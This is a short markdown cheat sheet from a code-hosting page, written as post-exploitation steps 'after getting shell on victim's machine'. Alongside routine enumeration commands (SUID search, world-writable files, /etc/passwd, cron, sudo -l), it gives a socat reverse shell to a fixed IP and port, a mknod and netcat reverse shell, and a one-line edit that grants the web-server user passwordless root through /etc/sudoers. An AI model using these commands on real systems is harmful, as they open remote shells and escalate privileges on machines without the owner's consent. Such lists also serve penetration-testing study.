Skip to content

Latest commit

 

History

History
95 lines (64 loc) · 1.51 KB

linux_enumeration.md

File metadata and controls

95 lines (64 loc) · 1.51 KB

Linux Enumeration

Things to do after getting shell on victim’s machine

  • Find World Writable Folders
find / -xdev -type d -perm -0002 -ls 2> /dev/null

- Find World Writable Files

```ShellSession
find / -xdev -type f -perm -0002 -ls 2> /dev/null
  • Find SUIDs
find / -perm -4000 -user root -exec ls -ld {} \; 2> /dev/null
  • DIstro Information
cat /etc/*-release
  • Check open ports
netstat -antup
  • Check for sudo permissions
sudo -l
  • Check OS architecture
uname -a
  • Check cronjobs
cat /etc/cron*
  • Check network configuration
ip addr
  • Check contents of /etc/passwd
cat /etc/passwd
  • Using socat
    • Listen
      $ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
- Connect
      $ socat file:`tty`,raw,echo=0 tcp-listen:4444
  • Reverse connection using mknod
mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc <ip> <port> 1> /tmp/backpipe; rm /tmp/backpipe
  • Check version of an installed application
dpkg -l <application name>
  • Sometimes checking /opt /tmp /var /usr might help.

  • Edit sudoers file and grant sudo access to the current user (www-data in this case) with no password

echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers